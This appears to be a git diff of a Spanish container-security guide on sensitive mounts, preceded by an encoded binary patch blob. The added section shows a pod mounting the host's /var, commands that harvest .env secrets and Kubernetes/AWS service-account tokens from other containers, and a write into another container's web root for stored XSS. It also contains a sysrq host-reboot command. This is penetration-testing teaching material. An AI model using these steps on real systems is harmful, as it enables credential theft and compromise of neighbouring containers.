zTLX3VA3UU;kbhgGehrLxKX^g^=^q)LL;z5y&W+eZR4R?9-O~L$2)|&x?f6=3Y!m?1 zv_@r29aZ@cl9?9>Y43!^aqlrnx|RM7XFcH3q?li9fwZmD*ITYjJ9+#fklCVDEm#g6 zVDzAlC}(uJz%agO+gA<%t^sI?A!Eatg^zX#Ac>Wt)7d~8FJfWa7E&V#1=4uzU5RLk zRtSE;?J^}E5NGE17i{?>ka=RkfvRa?2I)Y4unsw7kXh&AW#JVQ21dRUA_U@v%lfz> zV`wr*dwzxp$50l8JU00$6F_;ZA7$swv;1aj3wJ}y;=Tz`X1$aQ_91OlaRG9Zp?;&U zP?-dhXETwMc)hPfo>G@_VB|C`E_V9it(8~9qwj?-apel1nO_<{xS|!mkN2a>E&a-Y zRKh~d9&2~f=gN?@{svy&D=drT!G9sQjYwe2yt^FLCqS)ml)ivp-hjE{hw-iPZ?Bdd zKPLXu>kz?X06MfezLUD*hD3eM3RSbKcE|=GdI#~RsNVD6%BV-{w7sBb8{R1BpmlKiq}1%Uk~BgmQvMO@-Td^vUIDxKNEEeuBoZ{mRX?g3}uI;^3=Zv8Y4^H1X{98Yr zfc!31%&9ii7X{EMlUs-l0YSd`o;7P}7QX1Pr82jYdGv0I2l*x5lf48aQ;r)}UC7kw@mlUDs22O9q8TIw&MOMiKwh z3Wy}-WS|jHb8t~U;KmsEa+6E~f%BIn3`~RGzkiP#`7kpFT#kL78f7dptGX`lg%+e^ z+>mZf$_?{Mfi@6X2utN1xNd~4#qJmT!4vPL1A^~@zt46U#ypyxU%RH3ouVSPKLi2X zRagjXsXaAOPl>5zcls;UkXyE?i4*PTG~`Rb8N-gm48uMXAhl3O%=0(g0b94fu%M3u z_A;+X`-ObU`Tkrzt*0!wjIuIS-1=F4Nm+K*bqy(tyi>;1CgtRsj(nB4 zkNZF>bBmqup_t=-(#3S_vQIcG)})6Aq%;rt72Yq5m`#+nkoNO5CqhFce8@rG&ia@3 zm9qg*;H_*4uRZ*n&>KEZNBk_1Q_5oF-1OoRnY(X9-P>X`9{AThEqnpV`fOmOFL?K& zbj|B8@?qpi~E6E12Otr)DJ?8S12t^q`#jJ ziLuPKw;`j9=uW>Y4krhT?|yNYMVk9Bq-@RAZz1E1ho)%O*4%N^U-e$SJa*2WKrc%mLp zoOYe~66-WsV;)SJ7JYxoD*7=-gCzmaPXjpFV5+xnb-;(|A%}hSQaYuAw;IDkq!LGB zcx10f3n)n3j9|Nbl|7JD3U4nkbc|Az-;RljdIM|t=%8r&COJ_ge`jD8+e`j-O?i4Z z#=uPO$y`E`<`%#CT#v%a$@-^YthAI13Df$xiR8yR%(s(#*?Y;ZLg4zKzAVY(*%vgr zOBIBn47`GMh*!9Oax5^fO;jW<(hU>`oRrJ5pp)BO7`^O;-ik{NE;{$&y`t=tXYm!M zAB}e507jX*(LBe@#xsI6(aCkCJx1Zr3HIh41k2086@oO$PDwmI|7`JrY-F9Lke_v& z&VgG^9^|w6UT=cimbWx|El#!rk&z+QMgi&#yh*Z1ZddV7pkn?2H(h#OP;f?`ZxFCe z2b^b}Kp-V=Wn00B&1tku2cJogK)QL|U4_M9Xef~a!4hJH*x5863-;>W%7Eb%a((NX z?3Ay10||Z49@$VV4sOtg!pRQz%eH0TZ#RjyVym3TA8NDIk#HU^u*9Ae1+IAElLdwh zXTvGsjO-npdL%>BDwnfK=E|DTI`rlKcm{CrrEfpz?}$qK@ph5JXWW^q0Qm9V{4Ur| zA6S*}WD_#fBWthkEf%-TB>qKD~j zb$lf%*3X2T-0*FZ?p2hmA9@-QT$KL#v){VW40Lw`F)0Li@lMN5_`b$3_7|Is;Bbq_ zIe?6B8^{Bhdx!6s_y9k_e^~&nnU;_tDpSEb=6*XVAv`eBh3a*9xyfgLHWd)doy&81 zhmLGqCgTQ}D^7-`y7fV}>?`sg*=t~#Ik*fvw_2*}A+ zG5Uo}mb2pnZOGsqB`&EF*k|W))5MDkS$Uh>pv;YfLve-6o?0O z@jO+jLfILpxB85+^IkI<((F(Pi8MvSutPpeKN?K*YJm6;G1|{hLvk9C?~0tVw$Zx# zfju>ZEO(rH&bbOH)HeLJSr!~(`*yHvdn1*Z=_KVHZ`f$pDW zF|D599;Enioy(xre&?O&`>-pgX5s{**;ohQ9Ttb`Q~VpqrEUCi+fRM1s)GRkYgU`w zy3qAF372QPY1I`-p>=$V<%Spqt;sUP681Jh-o<l95@}{MN%*2O zeCXw`J_^^!o0m9{vbVA%>3~phOBiJ&z1@r6)=@;MuKY8iTf!A34!( z_byn(nzc=d`%DIX7!we*sLWF!$0(Av@9)sO&5_fskHd!gfBji-LGm7qyG~sb1Ywt zaS^;AtyNZ5#!R|713Ioo-7E=mJf^KfOSbEt+dIBWdp-U0)^|)WW+qw^*?^Yhh+6#T z{OER!ic}ps#+JOh;GZG-dolR$N_JZn*rJFQ8T^ZN-(M_-hEjmN$4+l``v0PawWMJo z4b9P08miX~{`a;2e~teaeIqy^TA{yZu=b|H{rRww>7(74rgv10QS@i52%*3Kz#z6v zo;x+=qRa^F%{+2fuV7_@dvzv1>HvWIj}Y?utpvYG91u&VqgcnlIgVY2uOC}vj=E{y zD=Q-HU$;%qNy8FhO*udmI5+v%;a7UGn<~gP_K4cu?E8!EsI^!i_;>KXjV*OTdUK-B zr!8ELVQ2e$s=^BCLxRv>8Oa4Xp3*h}04%?Pu%JL2NsX|Oa{bx=wywV?ITc_pN{9d2 z51b|0fAY`X_B)Wc`+txGwEh5)b66lxAd1hBk8#x_X_;;*+(?sk{OafD zZzENkKx~&Ty|dK5a`(l{WDcoQ86oMHgv68^RfSbnkGy!%|C|_ky|5)G`ks*LcSKMnl;!{} zJrf7;LFN8|X?W4wxxFv{J=I}&N=f$qXv6tuSsLK9Qgg`t^Id;Ypn)W_M2&o&OxF32 zDnRJ?F_TTCZA(NgoKrXOS8NGs)coNSC&zc!c1R@)bcm;!jtBwAwHGnFGEVT70yode z3oTZlFRq(gdWyW2<{@5oyh=w?3E!Qk39pb3n#3>&;c0kqP|mk~w)Z*B%W6b33NU?u z6nB1w{^FyZJQqO<%$f0eXdJN@(|n2AxM z=GsyNZmjP?gCgCvC!MXU_}5@o$zlthL@Yl$Cb**fjJAJaV*zMaS=)t|wN{xh$HD!} z0i@2+9qeFw@}G{QN+81EXO=o8&aeS{5$nYH&eTu;hYw1j44L+BVh~BJK!0Lv$p?|V z-CH11O88La#Xo6$J@;k;hP?JfxUk3_Z`a21 zp)1Fgt{uL>s#E-cOQa{rd2^;_$6KW8Fz@rbb{&pK$w_srSN_r&nUi)`;-txDt~LrF%K@d`BznQ&+(spaXaQWY56Z^2wly?`AUQhKJ{U6G~TF1YZ*T z{Kt*yuIA`1a9m0^=n2~XA!$bT+5GLTQ#CsUF%c~Q&DfU6=J|1#+o@-y?oWm}j$EFG z+wkR7|1}m08XKxCPLSQ(wpz%t7TnQJib_$+RkFN_n7WcJbK|F?@U_fY4YFMH5smuuvqB;ICHTqPg1(7Cg2OEU5u1K;>;61-Eh zSxPzfWy+DDf^pXfZVEAvzWbDt7m@i0Xp|#OWjxw@p09Szus~?P)%2INsM6bPqQXxp zV$l-LRMQQSqy5IWQeX&6zxi7qPQ6oE`;jSOOHi0*qR{bNzN$+7VUj-D91U713Vw3Q zeEL8Qp=jqk&q(+`1D;J=P-)XnX$KS(bvYn?fM8-{sUu!-dK!K#{u%ZCE&FIux}J~c zFW3GO-}&*Q^}6i0&EL{Gec~K{z-&AX;gV*G$y18_Mq(vk_yvU^1c?tAd{v-rt#>!N z#Cd1rx$xT?`z#t53M$Rtj!_!xA@yGI{nRF{bw76%{+3v|H-ReA&sz}FBtEV@?p0ba zd^p&82*2Od0oqq0Z}=Uv+IXE0z~|y9w;WZ{jKxV?Ttj<3_j8-x6r12!UnD`1qXhS3 zz%wkNGnt#`e~T_s#lID#G-9VjUi373#J94g*TpvsWbLE&?ig(c#%mxSoxf?6Q@(}@ z@|~HfZJAQ)eMZM-j`DbA1c46Ii(>&6W2vC6Qz+i z2T+B}y*`T`FsbJ>y3G6IsWFVfRFqbpf#R9%+yttg0I`!Nl?UbDm;7wKh+}+8xplD8 zpDO!n!H~^6AV5q()|5JMipcSo0;^7;GuV^BwU|_W@H(>SRblC9DS2>b3E2_yO`7cG z_XV6wK0?M^cBqI4N*rPJRM<)Dty{1q#+V;?GeP@Ci7tJWqjBU#7^xh!rF$Lza_iTv ziEo-`_6Q~b1UEsT2)iuXop^zolr>3y$IrS#201@&+yn;B=F6+p<(rCkwfWk>?g(=z z{&XnH+2B1BgX(l-{}I^)M-Nn{B{1<(N3Ii`#lUs>{!;;5}6?x}8L3F~*c6Yr|)LdG6% zLP95-gL7w|7YLX!QCgIL4eJ4;n1%Um3eCBm#sviwKEPc_a91uUCuICAWopg%6F=hE z9z#-skVFLOF+2W4IjYB%ru`(!s}+uJ0u|rf7U(l6=b{!mCwj+*R*-eG!D`XYC!9So3Fbm8Pf$YnUDfI2{>B*=0r8GtN zx-aPHqL*Sn1{>s{1~xuJ+DaJg+#94w+Q}QiRVB#HP!5rncX!y~u< zn+HBK_`h)?^OI#m&MoCg&2~4FvJt%g^`>195>#|F~J6jWS>IQsO zV6M;L81Qq1db*eG(i6%wDqw#d3;A~R`T3jcY7yGd;V$#evcLygWCy6rLI|*f0N&U885pqHTt| z@4f#1;Gz~5I>|vkgSDLdd$Vz18hL7e`uw+KEGrWw)~5vbA31=#(9l&^HtPTVcBvmA z?ZBp{UBSff- /proc/sysrq-trigger # Reinicia el host - Interactúa con el dispositivo de memoria del kernel `/dev/mem`. - Históricamente vulnerable a ataques de escalada de privilegios. -- Más en [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). +- Más sobre [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). #### **`/proc/kcore`** - Representa la memoria física del sistema en formato ELF core. - La lectura puede filtrar el contenido de la memoria del sistema host y otros contenedores. -- Un tamaño de archivo grande puede llevar a problemas de lectura o fallos de software. +- El gran tamaño del archivo puede llevar a problemas de lectura o fallos de software. - Uso detallado en [Dumping /proc/kcore in 2019](https://schlafwandler.github.io/posts/dumping-/proc/kcore/). #### **`/proc/kmem`** - Interfaz alternativa para `/dev/kmem`, representando la memoria virtual del kernel. -- Permite lectura y escritura, por lo tanto, modificación directa de la memoria del kernel. +- Permite la lectura y escritura, por lo que la modificación directa de la memoria del kernel. #### **`/proc/mem`** - Interfaz alternativa para `/dev/mem`, representando la memoria física. -- Permite lectura y escritura, la modificación de toda la memoria requiere resolver direcciones virtuales a físicas. +- Permite la lectura y escritura, la modificación de toda la memoria requiere resolver direcciones virtuales a físicas. #### **`/proc/sched_debug`** @@ -111,7 +111,7 @@ echo b > /proc/sysrq-trigger # Reinicia el host #### **`/proc/[pid]/mountinfo`** -- Proporciona información sobre puntos de montaje en el namespace de montaje del proceso. +- Proporciona información sobre los puntos de montaje en el namespace de montaje del proceso. - Expone la ubicación del `rootfs` o imagen del contenedor. ### Vulnerabilidades de `/sys` @@ -165,6 +165,92 @@ cat /output %%% - `debugfs` ofrece una interfaz de depuración "sin reglas" al kernel. - Historial de problemas de seguridad debido a su naturaleza sin restricciones. +### Vulnerabilidades de `/var` + +La carpeta **/var** del host contiene sockets de tiempo de ejecución de contenedores y los sistemas de archivos de los contenedores. Si esta carpeta se monta dentro de un contenedor, ese contenedor obtendrá acceso de lectura y escritura a los sistemas de archivos de otros contenedores con privilegios de root. Esto puede ser abusado para pivotar entre contenedores, causar una denegación de servicio o crear puertas traseras en otros contenedores y aplicaciones que se ejecutan en ellos. + +#### Kubernetes + +Si un contenedor como este se despliega con Kubernetes: +```yaml +apiVersion: v1 +kind: Pod +metadata: +name: pod-mounts-var +labels: +app: pentest +spec: +containers: +- name: pod-mounts-var-folder +image: alpine +volumeMounts: +- mountPath: /host-var +name: noderoot +command: [ "/bin/sh", "-c", "--" ] +args: [ "while true; do sleep 30; done;" ] +volumes: +- name: noderoot +hostPath: +path: /var +``` +Dentro del contenedor **pod-mounts-var-folder**: +```bash +/ # find /host-var/ -type f -iname '*.env*' 2>/dev/null + +/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/201/fs/usr/src/app/.env.example + +/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/135/fs/docker-entrypoint.d/15-local-resolvers.envsh + +/ # cat /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/105/fs/usr/src/app/.env.example | grep -i secret +JWT_SECRET=85da0 +REFRESH_TOKEN_SECRET=14ea + +/ # find /host-var/ -type f -iname 'index.html' 2>/dev/null +/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/57/fs/usr/src/app/node_modules/@mapbox/node-pre-gyp/lib/util/nw-pre-gyp/index.html + +/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/140/fs/usr/share/nginx/html/index.html +/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/132/fs/usr/share/nginx/html/index.html + +/ # echo '' > /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/140/fs/usr/sh +are/nginx/html/index2.html +``` +El XSS se logró: + +![Stored XSS via mounted /var folder](/images/stored-xss-via-mounted-var-folder.png) + +Tenga en cuenta que el contenedor NO requiere un reinicio ni nada. Cualquier cambio realizado a través de la carpeta montada **/var** se aplicará instantáneamente. + +También puede reemplazar archivos de configuración, binarios, servicios, archivos de aplicación y perfiles de shell para lograr RCE automático (o semi-automático). + +##### Acceso a credenciales de la nube + +El contenedor puede leer tokens de serviceaccount de K8s o tokens de webidentity de AWS, lo que permite al contenedor obtener acceso no autorizado a K8s o a la nube: +```bash +/ # cat /host-var/run/secrets/kubernetes.io/serviceaccount/token +/ # cat /host-var/run/secrets/eks.amazonaws.com/serviceaccount/token +``` +#### Docker + +La explotación en Docker (o en implementaciones de Docker Compose) es exactamente la misma, excepto que generalmente los sistemas de archivos de los otros contenedores están disponibles bajo una ruta base diferente: +```bash +$ docker info | grep -i 'docker root\|storage driver' +Storage Driver: overlay2 +Docker Root Dir: /var/lib/docker +``` +Los sistemas de archivos están bajo `/var/lib/docker/overlay2/`: +```bash +$ sudo ls -la /var/lib/docker/overlay2 + +drwx--x--- 4 root root 4096 Jan 9 22:14 00762bca8ea040b1bb28b61baed5704e013ab23a196f5fe4758dafb79dfafd5d +drwx--x--- 4 root root 4096 Jan 11 17:00 03cdf4db9a6cc9f187cca6e98cd877d581f16b62d073010571e752c305719496 +drwx--x--- 4 root root 4096 Jan 9 21:23 049e02afb3f8dec80cb229719d9484aead269ae05afe81ee5880ccde2426ef4f +drwx--x--- 4 root root 4096 Jan 9 21:22 062f14e5adbedce75cea699828e22657c8044cd22b68ff1bb152f1a3c8a377f2 + +``` +#### Nota + +Las rutas reales pueden diferir en diferentes configuraciones, por lo que tu mejor opción es usar el comando **find** para localizar los sistemas de archivos de los otros contenedores. + ### Referencias - [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)